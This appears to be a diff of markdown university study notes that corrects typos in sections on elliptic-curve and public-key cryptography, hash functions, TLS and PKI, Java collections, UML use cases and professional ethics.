- While easy to calculate for modular arithmetic, the number of points on a give elliptic curve is not so obvious - While easy to calculate for modular arithmetic, the number of points on a given elliptic curve is not so obvious
- You might imagine that a curve would have $2p+1$ points, in reality it is fewer than this - You might imagine that a curve would have $2p+1$ points, in reality it is fewer than this
- This is closer to $p$ - This is closer to $p$
- Hasse’s theorem states that for a curve $E$ over a field $\mathbb{Z}_p$, the number of elements $\#E$ is bounded by: - Hasse’s theorem states that for a curve $E$ over a field $\mathbb{Z}_p$, the number of elements $\#E$ is bounded by:
- $\#E=p+1+\epsilon$ - $\#E=p+1+\epsilon$
- where $|\epsilon| \leq 2\sqrt{p}$ - where $|\epsilon| \leq 2\sqrt{p}$
##### #E ##### #E
- A large #E is very important to prevent various attacks on ECDLP - A large #E is very important to prevent various attacks on ECDLP
- Calculating it exactly is hard, it can be done with Shoof’s algorithm - Calculating it exactly is hard; it can be done with Schoof’s algorithm
- Various properties of #E enable or restrict certain attacks - Various properties of #E enable or restrict certain attacks
##### How Hard is ECDLP ##### How Hard is ECDLP
- There are generic algorithms like **Polig-Hellman** that are applicable to any category of DLP - There are generic algorithms like **Pohlig-Hellman** that are applicable to any category of DLP
- Polig-Hellman requires $O(\sqrt{\#E})$ steps - Pohlig-Hellman requires $O(\sqrt{\#E})$ steps
- These are generic attacks mean curves and parameters should be chosen with care - These generic attacks mean curves and parameters should be chosen with care
- The most powerful attack on modular arithmetic based DLP is **index calculus** - The most powerful attack on modular arithmetic based DLP is **index calculus**
- It is this attack that forces modular arithmetic based crypto-systems to use >2000 bit keys - It is this attack that forces modular arithmetic based crypto-systems to use >2000 bit keys
- Index calculus does not work on elliptic curves so they only need to remain secure against generic attacks - Index calculus does not work on elliptic curves so they only need to remain secure against generic attacks
#### Efficient Computation #### Efficient Computation
- There is no nautral way of calculating $a\cdot P$ - There is no natural way of calculating $a\cdot P$
- Think back to binary exponentiation, square and multiply `->` double and add - Think back to binary exponentiation, square and multiply `->` double and add
| Decimal | Binary | | Decimal | Binary |
@@ -199,13 +201,11 @@ E, \#E, G \\
\mathrm{Bob}: a\in \{1,2,...,\#E-1\} \\ \mathrm{Bob}: a\in \{1,2,...,\#E-1\} \\
$$ $$
Alice takes point $G$ on the curve and adds it to $a$: $A = a\cdot G$
Alice takes point $G$ on the curve and add it to $a$: $A = a\cdot G$
Bob does the same: $B=b\cdot G$ Bob does the same: $B=b\cdot G$
Alice takes bob’s public key $k_{ab} = a\cdot B$ Alice takes Bob’s public key $k_{ab} = a\cdot B$
Bob does the same: $k_{ab}=b\cdot A$ Bob does the same: $k_{ab}=b\cdot A$
@@ -227,7 +227,7 @@ Where each layer builds on the one beneath
- Since we know the formula for a given curve, we do not need to transport full $(x,y)$ coordinates - Since we know the formula for a given curve, we do not need to transport full $(x,y)$ coordinates
- Each point contains a unique $x$, and one or two $y$ where - Each point contains a unique $x$, and one or two $y$ where
- $y=\sqrt{x^3 + 2x + 2}\mod p$ - $y=\sqrt{x^3 + 2x + 2}\mod p$
- Most implementations will use the full $x$ value, and append a single bit representing a positive or negative y value - Most implementations will use the full $x$ value, and append a single bit representing a positive or negative y value
#### Projective Coordinates #### Projective Coordinates
@@ -244,11 +244,11 @@ Where each layer builds on the one beneath
- The choice of curve parameters influences both security and efficiency of crypto-systems based around ECs - The choice of curve parameters influences both security and efficiency of crypto-systems based around ECs
- Never use a randomly generated curve! - Never use a randomly generated curve!
- The chances are the number of points we generate will have a subgroup susecpible to Polig-Hellmen - The chances are the number of points we generate will have a subgroup susceptible to Pohlig-Hellman
- Standard curves exist in various forms - Standard curves exist in various forms
- Varied equations - Varied equations
- Different implementation methods - Different implementation methods
- Different choices of prime - Different choices of prime
##### P-256 ##### P-256
@@ -259,8 +259,8 @@ Where each layer builds on the one beneath
![1648487070.png](img/1648487070.png) ![1648487070.png](img/1648487070.png)
- $h$ is the cofactor, the size of the subgroup in $G$ - $h$ is the cofactor, the size of the subgroup in $G$
- Because its 1 it means all the points are being generated - Because it's 1 it means all the points are being generated
- If it was 2, only half of the points are being generated - If it was 2, only half of the points are being generated
##### secp256k1 ##### secp256k1
@@ -289,5 +289,5 @@ Where each layer builds on the one beneath
#### Primary Applications #### Primary Applications
- Elliptic Curve Diffie Hellman - Elliptic Curve Diffie Hellman
- DSA Signatures scheme, based on Elgamal signatures - DSA signature scheme, based on Elgamal signatures
- Similar schemes involving the alternative curves such as `Ed25519` and `Ed448` - Similar schemes involving the alternative curves such as `Ed25519` and `Ed448`
+21 -21
View File
@@ -1,8 +1,8 @@
# Elgamal Encryption # Elgamal Encryption
#### Extending Diffie-Hellmen to Encryption #### Extending Diffie-Hellman to Encryption
We could do is multiply the plain text by the key generated What we could do is multiply the plain text by the key generated
$y\equiv x\cdot k_{ab}\mod p \rightarrow x\equiv y\cdot k_{ab}^{-1}$ $y\equiv x\cdot k_{ab}\mod p \rightarrow x\equiv y\cdot k_{ab}^{-1}$
@@ -28,35 +28,35 @@ $y\equiv x\cdot k_{ab}\mod p \rightarrow x\equiv y\cdot k_{ab}^{-1}$
1. Choose $a\in \{1,2,...,p-1\}$ 1. Choose $a\in \{1,2,...,p-1\}$
2. Compute ephemeral key 2. Compute ephemeral key
- $k_E\equiv g^a\mod p$ - $k_E\equiv g^a\mod p$
- Remember ephemeral means the key is generated every time communication happens - Remember ephemeral means the key is generated every time communication happens
3. Compute masking key 3. Compute masking key
- $k_M\equiv B^a\mod p$ - $k_M\equiv B^a\mod p$
4. Encrypt message $x\in\mathbb{Z}^*_p$ 4. Encrypt message $x\in\mathbb{Z}^*_p$
- $y\equiv x\cdot k_M\mod p$ - $y\equiv x\cdot k_M\mod p$
5. Send $(k_E,y)$ 5. Send $(k_E,y)$
#### Elgamal Decryption #### Elgamal Decryption
1. Compute masking key 1. Compute masking key
- $k_M\equiv k_E^b\mod p$ - $k_M\equiv k_E^b\mod p$
2. Decrypt message 2. Decrypt message
- $x\equiv y\cdot k_M^{-1}\mod p$ - $x\equiv y\cdot k_M^{-1}\mod p$
### Computational Efficiency ### Computational Efficiency
To calculate bobs private key we use one exponentiation To calculate Bob's private key we use one exponentiation
Alice has to do two binary exponentiation to send a message to bob Alice has to do two binary exponentiations to send a message to Bob
![1648752755.png](img/1648752755.png) ![1648752755.png](img/1648752755.png)
- Both the exponentiations during encryption can be pre-computed during down time - Both the exponentiations during encryption can be pre-computed during downtime
- We can also improve on the decryption step using Fermat’s little theorem - We can also improve on the decryption step using Fermat’s little theorem
- Fermat’s Little Theorem: $a^{p-1}\equiv 1\mod p$ - Fermat’s Little Theorem: $a^{p-1}\equiv 1\mod p$
1. Compute $k_M=k_E^b\mod 67$ 1. Compute $k_M=k_E^b\mod 67$
2. Compute $k_M^{-1}$ 2. Compute $k_M^{-1}$
3. Decrypt $y=y\cdot k_M^{-1}\mod p$ 3. Decrypt $y=y\cdot k_M^{-1}\mod p$
#### Practicalities #### Practicalities
@@ -119,17 +119,17 @@ Recall: $a^{p-1}\equiv 1\mod p$ for some $m$
- Computed in a subgroup of prime order q, which is usually 160 bits - Computed in a subgroup of prime order q, which is usually 160 bits
- This means the signature (r, s) is 320 bits - This means the signature (r, s) is 320 bits
- Hashing is enforced by the algorithm, and a hash function must match the key size - Hashing is enforced by the algorithm, and a hash function must match the key size
- e.g. SHA-1 for 160-bit q, SHA-256 for 256 bit q - e.g. SHA-1 for 160-bit q, SHA-256 for 256 bit q
- Index calculus does not apply to the sub-group, so 160 bit DSA has a security of 80 bits - Index calculus does not apply to the sub-group, so 160 bit DSA has a security of 80 bits
- In practice larger keys would be required now - In practice larger keys would be required now
#### ECDSA #### ECDSA
- Identical to DSA, ECDSA operates on an elliptic curve over $\mathbb{Z}_p$ with the signature calculated over a subgroup of prime order $\#q$ - Identical to DSA, ECDSA operates on an elliptic curve over $\mathbb{Z}_p$ with the signature calculated over a subgroup of prime order $\#q$
- More efficient, does not require modulus of thousands of bits - More efficient, does not require modulus of thousands of bits
- Security level is based on generic attacks against EC - Security level is based on generic attacks against EC
- i.e $\sqrt{|\#q|}$ - i.e. $\sqrt{|\#q|}$
- Deterministic generation of $k$ is often used for safety (RFC 6979) - Deterministic generation of $k$ is often used for safety (RFC 6979)
- This is where the ephemeral key isn’t random, it’s based off the hash of the message - This is where the ephemeral key isn’t random, it’s based off the hash of the message
- This is because reusing the ephemeral key is bad news - This is because reusing the ephemeral key is bad news
- Other variants like EdDSA using Edwards curves (Ed25519 / Ed448) exist - Other variants like EdDSA using Edwards curves (Ed25519 / Ed448) exist
@@ -3,7 +3,7 @@
- A signature is proof of authenticity of the sender - A signature is proof of authenticity of the sender
- Verification is performed by checking the signature against a known signature - Verification is performed by checking the signature against a known signature
- Mostly works for the real world, not very robust - Mostly works for the real world, not very robust
- This does not scale - This does not scale
#### Electronic Signature #### Electronic Signature
@@ -33,7 +33,7 @@ $$
> >
> This requires using a private key > This requires using a private key
Symetric Signatures gives us: Symmetric signatures give us:
**Authenticity**: The sender is confirmed as authentic - only Alice or Bob could have generated the signature **Authenticity**: The sender is confirmed as authentic - only Alice or Bob could have generated the signature
@@ -41,7 +41,7 @@ Symetric Signatures gives us:
**Non-Repudiation**: We don’t have this - the symmetric key means that either Alice or Bob could have sent the message **Non-Repudiation**: We don’t have this - the symmetric key means that either Alice or Bob could have sent the message
### Pubic Key Signatures ### Public Key Signatures
- By using asymmetric cryptography we have non-repudiation. - By using asymmetric cryptography we have non-repudiation.
@@ -65,14 +65,14 @@ Verification: $s^e\mod n$
- Signing and verification require one use of the *square and multiply* algorithm - Signing and verification require one use of the *square and multiply* algorithm
- Efficiency depends on the exponents - Efficiency depends on the exponents
- We often keep $e$ small - We often keep $e$ small
- $65537=2^{16}+1=10000000000001_2$ - $65537=2^{16}+1=10000000000001_2$
- This prioritises verification speed - This prioritises verification speed
##### Signature Forgeries ##### Signature Forgeries
- A forgery is the ability to create a valid message / signature pair $(m,s)$ where $m$ hasn’t previously been signed by the legitimate signer - A forgery is the ability to create a valid message / signature pair $(m,s)$ where $m$ hasn’t previously been signed by the legitimate signer
- For example replay attack using a previous $(m,s)$ wouldn’t count as a forgery - For example, a replay attack using a previous $(m,s)$ wouldn’t count as a forgery
- As we cannot control the message contents - As we cannot control the message contents
- Various severities of attack exist depending on the control over the message $m$ - Various severities of attack exist depending on the control over the message $m$
###### Existential Forgeries ###### Existential Forgeries
@@ -84,49 +84,51 @@ Verification: $s^e\mod n$
An attacker has access to Alice’s public key $(n,e)$ An attacker has access to Alice’s public key $(n,e)$
- They can calculate - They can calculate
- $s=\textrm{random}$ - $s=\textrm{random}$
- $m' =s^e\mod n$ - $m' =s^e\mod n$
- It is trival to generate message and signature pairs based on an RSA public key - It is trivial to generate message and signature pairs based on an RSA public key
- Not very useful - Not very useful
###### Selective Forgeries ###### Selective Forgeries
- The attacker is able to create a valid message / signature pair $(m,s)$ where they have selected $m$ in advanced - The attacker is able to create a valid message / signature pair $(m,s)$ where they have selected $m$ in advance
- $m$ may have some mathematical proprieties, or be all zeros etc - $m$ may have some mathematical properties, or be all zeros etc.
- It is a requirement that $m$ be fixed prior to the attack - It is a requirement that $m$ be fixed prior to the attack
###### Universal Forgeries ###### Universal Forgeries
- The attacker can create a valid signature from any message $m$ - The attacker can create a valid signature from any message $m$
- This is the strongest attack, and implies the previous attacks too - This is the strongest attack, and implies the previous attacks too
- In RSA, this would imply the attack has access to the private key - In RSA, this would imply the attacker has access to the private key
### Malleability ### Malleability
- RSA is also malleable: $RSA(m_1\cdot m_2)=RSA(m_1)\cdot RSA(m_2)$ - RSA is also malleable: $RSA(m_1\cdot m_2)=RSA(m_1)\cdot RSA(m_2)$
- Given two messages $x_1, x_2$ and corresponding signatures $s_1,s_2$ - Given two messages $x_1, x_2$ and corresponding signatures $s_1,s_2$
- $(m_3,s_3)\equiv(m_1\cdot m_2, s_1\cdot s_2)(\mod m)$ - $(m_3,s_3)\equiv(m_1\cdot m_2, s_1\cdot s_2)(\mod m)$
- This is more control for an attacker than we would like to have for a signature scheme - This is more control for an attacker than we would like to have for a signature scheme
- Malleability is a weakness of encryption with textbook RSA too - Malleability is a weakness of encryption with textbook RSA too
### Padding ### Padding
- If we enforce rules about valid formatting on $m$, random messages produced by attackers are unlikely to pass - If we enforce rules about valid formatting on $m$, random messages produced by attackers are unlikely to pass
- ![1649188921.png](img/1649188921.png)
- ![1649188921.png](img/1649188921.png)
- Likelihood of a successful forgery is $2^{-y}$ - Likelihood of a successful forgery is $2^{-y}$
- Probability of last bit $2^{-1}$ - Probability of last bit $2^{-1}$
- Probability of last 2 bits $2^{-2}$ - Probability of last 2 bits $2^{-2}$
- etc up to $y$ - etc. up to $y$
#### Hash-then-sign #### Hash-then-sign
- It is common to hash the message within any padding scheme - It is common to hash the message within any padding scheme
- $sig_{k_{prvA}}(x)\equiv H(x)^d \mod n$ - $sig_{k_{prvA}}(x)\equiv H(x)^d \mod n$
- Verification recomputes the hash - Verification recomputes the hash
- $ver_{k_{pubA}}(x,s)= s^e \mod n \equiv H(x)'$ - $ver_{k_{pubA}}(x,s)= s^e \mod n \equiv H(x)'$
- $H(x)\stackrel{?}{=}H(x)'$ - $H(x)\stackrel{?}{=}H(x)'$
- Existential forgeries are much harder - Existential forgeries are much harder
- You’d need a random message that’s also a valid hash - You’d need a random message that’s also a valid hash
- Longer messages can be signed, the hash outputs a smaller message digest - Longer messages can be signed, the hash outputs a smaller message digest
##### PKCS v1.5 ##### PKCS v1.5
@@ -135,7 +137,7 @@ An attacker has access to Alice’s public key $(n,e)$
- Modern padding schemes use hashing and padding for security - Modern padding schemes use hashing and padding for security
- Prevents existential forgeries, and attacks on small messages - Prevents existential forgeries, and attacks on small messages
- This is deterministic, the same message gives the same signature - This is deterministic, the same message gives the same signature
![1649192054.png](img/1649192054.png) ![1649192054.png](img/1649192054.png)
@@ -145,8 +147,8 @@ An attacker has access to Alice’s public key $(n,e)$
- “with appendix” refers to any scheme that sends $(m,s)$ separately - “with appendix” refers to any scheme that sends $(m,s)$ separately
- PKCS and similar schemes are deterministic - PKCS and similar schemes are deterministic
- The probabilistic signature scheme adds a random salt to the process, meaning repeated singatures on the same document produce different results - The probabilistic signature scheme adds a random salt to the process, meaning repeated signatures on the same document produce different results
- Doesn’t effect security that much, some standards have gone back to a probabilistic approach - Doesn’t affect security that much; some standards have gone back to a probabilistic approach
###### PSS Encoding ###### PSS Encoding
@@ -157,7 +159,7 @@ An attacker has access to Alice’s public key $(n,e)$
5. Expand $H$ using $MGF$ 5. Expand $H$ using $MGF$
6. Calculate $DB \oplus MGF(H)$ to create maskedDB 6. Calculate $DB \oplus MGF(H)$ to create maskedDB
7. Output is maskedDB, $H$ and a constant `0xbc` 7. Output is maskedDB, $H$ and a constant `0xbc`
- `0xbc` is just a constant, no specific meaning other than formatting - `0xbc` is just a constant, no specific meaning other than formatting
8. Use RSA to calculate signature and send $(m,s)$ as normal 8. Use RSA to calculate signature and send $(m,s)$ as normal
![1649192548.png](img/1649192548.png) ![1649192548.png](img/1649192548.png)
@@ -180,4 +182,4 @@ An attacker has access to Alice’s public key $(n,e)$
Nothing is faster than RSA verification, signing is slower Nothing is faster than RSA verification, signing is slower
Its quick because of how 65537 is structured It's quick because of how 65537 is structured
@@ -4,7 +4,7 @@
- Could we simply split up a message and sign parts? - Could we simply split up a message and sign parts?
![1649192960.png](img/1649192960.png)\ ![1649192960.png](img/1649192960.png)
A lot of faff for signing large files A lot of faff for signing large files
@@ -16,7 +16,7 @@ A lot of faff for signing large files
2. Fixed output length 2. Fixed output length
3. Pre-image resistance (one way) 3. Pre-image resistance (one way)
4. Second pre-image resistance 4. Second pre-image resistance
- If we have a hashed message, we cannot find another message with the same hash - If we have a hashed message, we cannot find another message with the same hash
5. Collision resistance 5. Collision resistance
#### Pre-image Resistance #### Pre-image Resistance
@@ -24,7 +24,7 @@ A lot of faff for signing large files
- Hash functions must be one-way - Hash functions must be one-way
- Given a hash of a message $H(x)$ it must be infeasible to calculate $x$ - Given a hash of a message $H(x)$ it must be infeasible to calculate $x$
- Less applicable to digital signatures - Less applicable to digital signatures
- Crucial to password storage and key derivation - Crucial to password storage and key derivation
#### Second Pre-image Resistance #### Second Pre-image Resistance
@@ -37,7 +37,7 @@ A lot of faff for signing large files
![1649193645.png](img/1649193645.png) ![1649193645.png](img/1649193645.png)
Oscar finds a weak message (one of the messages is known ahead of time), he replaces the message $x_1$ with $x_2$. Now Oscar can send a signed message to Alice Oscar finds a weak message (one of the messages is known ahead of time); he replaces the message $x_1$ with $x_2$. Now Oscar can send a signed message to Alice
#### Collision Resistance #### Collision Resistance
@@ -80,8 +80,8 @@ P(n)&=(1-\frac{1}{365})\cdot (1-\frac{2}{365})\dots (1-\frac{n-1}{365})
$$ $$
- The probability of at least one collision is $1 – P(\textrm{no collision})$. - The probability of at least one collision is $1 – P(\textrm{no collision})$.
- The probability of a collision with only 23 people is ~50%! - The probability of a collision with only 23 people is ~50%!
- For 40 people it’s ~90% - For 40 people it’s ~90%
- The same principle applies to hash functions, the more hashes computed, the more likely a collision becomes - The same principle applies to hash functions, the more hashes computed, the more likely a collision becomes
![1649194470.png](img/1649194470.png) ![1649194470.png](img/1649194470.png)
@@ -3,8 +3,8 @@
### Message Authentication Codes ### Message Authentication Codes
- Provide integrity and authenticity - not confidentiality - Provide integrity and authenticity - not confidentiality
- Protecting system files - Protecting system files
- Ensuring messages haven’t been altered - Ensuring messages haven’t been altered
- Calculate a keyed hash of the message, then append this to the end of the message - Calculate a keyed hash of the message, then append this to the end of the message
![1653664490.png](img/1653664490.png) ![1653664490.png](img/1653664490.png)
@@ -18,7 +18,7 @@
#### Authenticated Encryption (AEAD) #### Authenticated Encryption (AEAD)
- It’s common to attach MACs to the end of ciphertext, that this is now usually built into ciphers as part of AEAD mode - It’s common to attach MACs to the end of ciphertext; this is now usually built into ciphers as part of AEAD mode
- You’re often able to authenticate non-encrypted “associated” data too - You’re often able to authenticate non-encrypted “associated” data too
![1653664720.png](img/1653664720.png) ![1653664720.png](img/1653664720.png)
@@ -30,19 +30,19 @@
- TLS is a protocol that provides *authenticated* and *encrypted* sessions - TLS is a protocol that provides *authenticated* and *encrypted* sessions
- Secure Socket Layer (SSL) came first, then after `v3.0` it became TLS - Secure Socket Layer (SSL) came first, then after `v3.0` it became TLS
- Transport Layer Security has two layers - Transport Layer Security has two layers
1. The record layer 1. The record layer
- Using established symmetric keys and other session info, will encrypt application packets, very like IPsec - Using established symmetric keys and other session info, will encrypt application packets, very like IPsec
2. The handshake layer 2. The handshake layer
- Used to establish session keys, as well as authenticate either party - usually the server using a public key certificate - Used to establish session keys, as well as authenticate either party - usually the server using a public key certificate
##### TLS Handshake ##### TLS Handshake
- The TLS handshake allows us to - The TLS handshake allows us to
- Establish the master secret - Establish the master secret
- Resume sessions - Resume sessions
- Authenticate the identity of the server or client - Authenticate the identity of the server or client
- This is for TLS 1.2 - ECDHE_RSA - This is for TLS 1.2 - ECDHE_RSA
- Elliptic curve with Diffie-Hellman ephemeral with RSA - Elliptic curve with Diffie-Hellman ephemeral with RSA
![1653665054.png](img/1653665054.png) ![1653665054.png](img/1653665054.png)
@@ -71,6 +71,7 @@ Random Number: 16cf43a...
Suite: TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 Suite: TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
[Session ID] [Session ID]
``` ```
Random nonce used to stop replay attacks Random nonce used to stop replay attacks
**Certificate** **Certificate**
@@ -97,7 +98,7 @@ Digital Signature calculated over the DH parameters
**[Certificate Request]** **[Certificate Request]**
Optional request for a certificate and singature from the client - only used in mutual TLS Optional request for a certificate and signature from the client - only used in mutual TLS
Imagine two banks communicating where both parties need to prove their identity. Imagine two banks communicating where both parties need to prove their identity.
@@ -117,7 +118,7 @@ Optional client certificate, verified by the server using PKI
**[Certificate Verify]** **[Certificate Verify]**
Digital signature computed over the bytes send in the handshake so far Digital signature computed over the bytes sent in the handshake so far
**Change Cipher Spec** **Change Cipher Spec**
@@ -147,7 +148,7 @@ Mitigates man-in-the-middle attacks
## Public Key Infrastructure ## Public Key Infrastructure
#### Why do we need PKI? #### Why do we need PKI?
![1653666858.png](img/1653666858.png) ![1653666858.png](img/1653666858.png)
@@ -184,7 +185,7 @@ Mitigates man-in-the-middle attacks
##### Who manages the Root Certificates? ##### Who manages the Root Certificates?
- Major OS vendors operate *root certificate programs* - Major OS vendors operate *root certificate programs*
- Apple for iOS and OS X - Apple for iOS and OS X
- Microsoft for Windows - Microsoft for Windows
- Mozilla maintains root certificate store - Mozilla maintains a root certificate store
- Used in linux & firefox - Used in Linux & Firefox
+31 -22
View File
@@ -4,24 +4,28 @@ Week 3 (Oct 5th)
**Part 1** **Part 1**
In java a *collection* is an object that represents a group of objects. In Java, a *collection* is an object that represents a group of objects.
The collections API is a unified framework for representing and manipulating collections independently of their implementation. The collections API is a unified framework for representing and manipulating collections independently of their implementation.
An *API* (application programming interface) is an interface protocol between a client and a server, intended to simplify the client side software. An *API* (application programming interface) is an interface protocol between a client and a server, intended to simplify the client-side software.
A *library* contains re-usable chunks of code. A *library* contains reusable chunks of code.
**Java Collections framework** **Java Collections framework**
- We have container objects that contain objects - We have container objects that contain objects
- All containers are either "collections" or "maps" - All containers are either "collections" or "maps"
- All containers provide a common set of method signatures, in addition of their unique set of method signatures - All containers provide a common set of method signatures, in addition to their unique set of method signatures
*Collection* - Something that holds a dynamic collection of objects *Collection* - Something that holds a dynamic collection of objects
*Map* - Defines mapping between keys and objects (two collections)
*Iterable* - Collections are able to return an iterator objects that can scan over the contents of a collection one object at a time
NOTE: Vector is a legacy structure in Java replaced with *ArrayList* *Map* - Defines mapping between keys and objects (two collections)
Stack is now *ArrayDeque*
*Iterable* - Collections are able to return an iterator object that can scan over the contents of a collection one object at a time
NOTE: Vector is a legacy structure in Java replaced with *ArrayList*.
Stack is now *ArrayDeque*.
`LinkedList(Collection<? extends E> c)` - means some type that either is E or a subtype of E. The `?` is a wildcard. `LinkedList(Collection<? extends E> c)` - means some type that either is E or a subtype of E. The `?` is a wildcard.
@@ -34,7 +38,7 @@ public static void main(String[] args) {
} }
``` ```
This is bad coding practice, the collection constructor are not able to specify the type of objects the collection is intended to contain. A `ClassCastException` will be thrown if we attempt to cast the wrong type. This is bad coding practice: the collection constructor does not specify the type of objects the collection is intended to contain. A `ClassCastException` will be thrown if we attempt to cast to the wrong type.
```java ```java
public static void main(String[] args) { public static void main(String[] args) {
@@ -45,13 +49,15 @@ public static void main(String[] args) {
} }
``` ```
This is a type safe collection using generics. This is a type-safe collection using generics.
- Classes support generics by allowing a type variable to be included in their declaration. - Classes support generics by allowing a type variable to be included in their declaration.
- The `<>` show the same type as stated (in this case string) - The `<>` indicate the same type as stated (in this case `String`)
- You cannot type a collection with a primitive data type eg int - You cannot type a collection with a primitive data type, e.g. `int`
**HashMap Class** **HashMap Class**
- A HashMap is a hash table based implementation of the map interface. This implementation provides all if the optional map operations, and permits null values and the null key.
- A HashMap is a hash-table-based implementation of the map interface. This implementation provides all of the optional map operations and permits null values and the null key.
```java ```java
public static void main(String[] args) { public static void main(String[] args) {
@@ -79,7 +85,7 @@ Millie = 17
__Relationships between objects__ __Relationships between objects__
*Aggregation* - The object exists outside the other. It is created outside so it is passed as an argument. *Aggregation* - The object exists outside the other. It is created outside so it is passed as an argument.
An animal object *is part of* a compound object (semantically) but the animal object can be shared and if the compound object is deleted, the animal object isn't deleted. An animal object *is part of* a compound object (semantically), but the animal object can be shared. If the compound object is deleted, the animal object isn't deleted.
```java ```java
public class Compound { public class Compound {
@@ -93,7 +99,7 @@ public class Compound {
![Image](assets/1.png) ![Image](assets/1.png)
*Composition* - The object only exists if the parent object exists, if the parent object is deleted then so is the child object. *Composition* - The object only exists if the parent object exists. If the parent object is deleted, then so is the child object.
The zoo object owns the compound object. If the zoo object is deleted then the compound object is also deleted. The zoo object owns the compound object. If the zoo object is deleted then the compound object is also deleted.
```java ```java
@@ -105,11 +111,13 @@ public class Zoo {
![Image](assets/2.png) ![Image](assets/2.png)
**Inheritance** **Inheritance**
A way of forming new classes based on existing classes. Has a "is-a" relationship.
*Polymorphism* - A concept in object oriented programming. Method overloading and method overriding are two types of polymorphism. A way of forming new classes based on existing classes. Has an "is-a" relationship.
*Polymorphism* - A concept in object-oriented programming. Method overloading and method overriding are two types of polymorphism.
- *Method Overloading* - Methods with the same name co-exist in the same class but they must have different method signatures. Resolved during compile time (static binding). - *Method Overloading* - Methods with the same name co-exist in the same class but they must have different method signatures. Resolved during compile time (static binding).
- *Method Overriding* - Methods with the same name is declared in parent and child class. Resolved during runtime (dynamic binding). - *Method Overriding* - Methods with the same name are declared in parent and child classes. Resolved at run time (dynamic binding).
```java ```java
public class Child extends Parent { public class Child extends Parent {
@@ -124,12 +132,13 @@ public class Child extends Parent {
} }
``` ```
The super keyword called the parent class' constructor. The `super` keyword calls the parent class's constructor.
![Image](assets/3.png) ![Image](assets/3.png)
**What is the difference between an abstract class and an interface** **What is the difference between an abstract class and an interface?**
- Java abstract class can have instance methods that implement a default behaviour. May contain non-final variables.
- A Java abstract class can have instance methods that implement a default behaviour. It may contain non-final variables.
- Java interfaces have methods that are implicitly abstract and cannot have implementations. Variables are declared final by default. - Java interfaces have methods that are implicitly abstract and cannot have implementations. Variables are declared final by default.
Interfaces are less restrictive when it comes to inheritance, interfaces can have many levels of inheritance where as a class can only have one level. Interfaces are less restrictive when it comes to inheritance: interfaces can have many levels of inheritance, whereas a class can only have one level.
+7 -12
View File
@@ -15,7 +15,6 @@ Latest version: **2.6**
<img src="assets/4.png" alt="img" style="zoom:80%;" /> <img src="assets/4.png" alt="img" style="zoom:80%;" />
## Object Orientated Analysis ## Object Orientated Analysis
**Use case diagrams** **Use case diagrams**
@@ -27,9 +26,9 @@ Latest version: **2.6**
`Actors` - Entities that interface with the system. Can be people or other systems. `Actors` - Entities that interface with the system. Can be people or other systems.
`Use case` - Based on user stories and represent what the actor wants your system to do for them. In the use case diagram only the use case name is represented. `Use case` - Based on user stories and represents what the actor wants your system to do for them. In the use case diagram, only the use case name is represented.
`Subject` - Classifier representing a business, software system, physical system or device under analysis design, or consideration. `Subject` - Classifier representing a business, software system, physical system or device under analysis, design or consideration.
`Relationships` `Relationships`
@@ -42,21 +41,18 @@ Latest version: **2.6**
> 1. Specifying common functionality and simplifying use case flows > 1. Specifying common functionality and simplifying use case flows
> 2. Using <<include>> or <<extend>> > 2. Using <<include>> or <<extend>>
**`<<include>>`**- multiple use cases share a piece of same functionality which is placed in a separate use case. **`<<include>>`** - Multiple use cases share a piece of the same functionality, which is placed in a separate use case.
**`<<extend>>`** - Used when activities might be performed as part of another activity but are not mandatory for a use case to run successfully. **`<<extend>>`** - Used when activities might be performed as part of another activity but are not mandatory for a use case to run successfully.
**Use case diagram of a fleet logistics management company** **Use case diagram of a fleet logistics management company**
![image](assets/5.png) ![image](assets/5.png)
**Base Path** - The optimistic path (best case scenario) **Base Path** - The optimistic path (best case scenario)
**Alternative Path** - Every other possible way the system can be used/abused. Includes perfectly normal alternate use, but also errors and failures. **Alternative Path** - Every other possible way the system can be used/abused. Includes perfectly normal alternate use, but also errors and failures.
Use Case: `Borrow copy of book` Use Case: `Borrow copy of book`
> **Purpose**: The book borrower (BB) borrows a book from the library using the Library Booking System (LBS) > **Purpose**: The book borrower (BB) borrows a book from the library using the Library Booking System (LBS)
@@ -72,7 +68,7 @@ Use Case: `Borrow copy of book`
> 2. BB provides membership card > 2. BB provides membership card
> 3. BB is logged in by LBS > 3. BB is logged in by LBS
> 4. LBS checks permissions / debts > 4. LBS checks permissions / debts
> 5. LBS asks for presenting a book > 5. LBS asks the borrower to present a book
> 6. BB presents a book > 6. BB presents a book
> 7. LBS scans RFID tag inside book > 7. LBS scans RFID tag inside book
> 8. LBS updates records accordingly > 8. LBS updates records accordingly
@@ -84,9 +80,8 @@ Use Case: `Borrow copy of book`
> >
> 1. BB's card has expired: Step 3a: LBS must provide a message that card has expired; LBS must exit the use case > 1. BB's card has expired: Step 3a: LBS must provide a message that card has expired; LBS must exit the use case
> >
> **Post conditions for base path** > **Postconditions for base path**
> >
> **Base path** - BB has successfully borrowed the book & system is up to date. > **Base path** - BB has successfully borrowed the book and the system is up to date.
> >
> **Alternate Path 1** - BB was NOT able to borrow the book & system is up to date. > **Alternative Path 1** - BB was NOT able to borrow the book and the system is up to date.
+42 -37
View File
@@ -1,64 +1,69 @@
# Why do we need Professional Ethics # Why do we need Professional Ethics
Computers enable social harm: Computers enable social harm:
## Illegal content and activity ## Illegal content and activity
- Terrorism
- Crypto-currencies can finance this
- Organised crime
- Phishing and fraud
- Information stealing malware
- Ransomware and DDoS extortion
- Domestic Abuse
- Abusers can look at devices connected to the internet to control their partner even after they have left the house to establish control
- Cyber-Bullying
- Sending harmful messages/photos to people
- Promoting hate
- Impersonating another person
- *No legal definition of cyber-bullying but still prosecutable*
- Child sexual exploitation and Abuse
- Solicitation, Grooming, Distribution of images & videos
- Trafficking
## Impact on health and well being - Terrorism
- Crypto-currencies can finance this
- Organised crime
- Phishing and fraud
- Information stealing malware
- Ransomware and DDoS extortion
- Domestic Abuse
- Abusers can look at devices connected to the internet to control their partner even after they have left the house to establish control
- Cyber-Bullying
- Sending harmful messages/photos to people
- Promoting hate
- Impersonating another person
- *No legal definition of cyber-bullying but still prosecutable*
- Child sexual exploitation and Abuse
- Solicitation, Grooming, Distribution of images & videos
- Trafficking
## Impact on health and well-being
- Computers can affect physical, social and mental health - Computers can affect physical, social and mental health
- Lower physical activity - Lower physical activity
- Increases loneliness - Increases loneliness
- Designed for addiction - Designed for addiction
- Click bait - Clickbait
- Infinite scroll - Infinite scroll
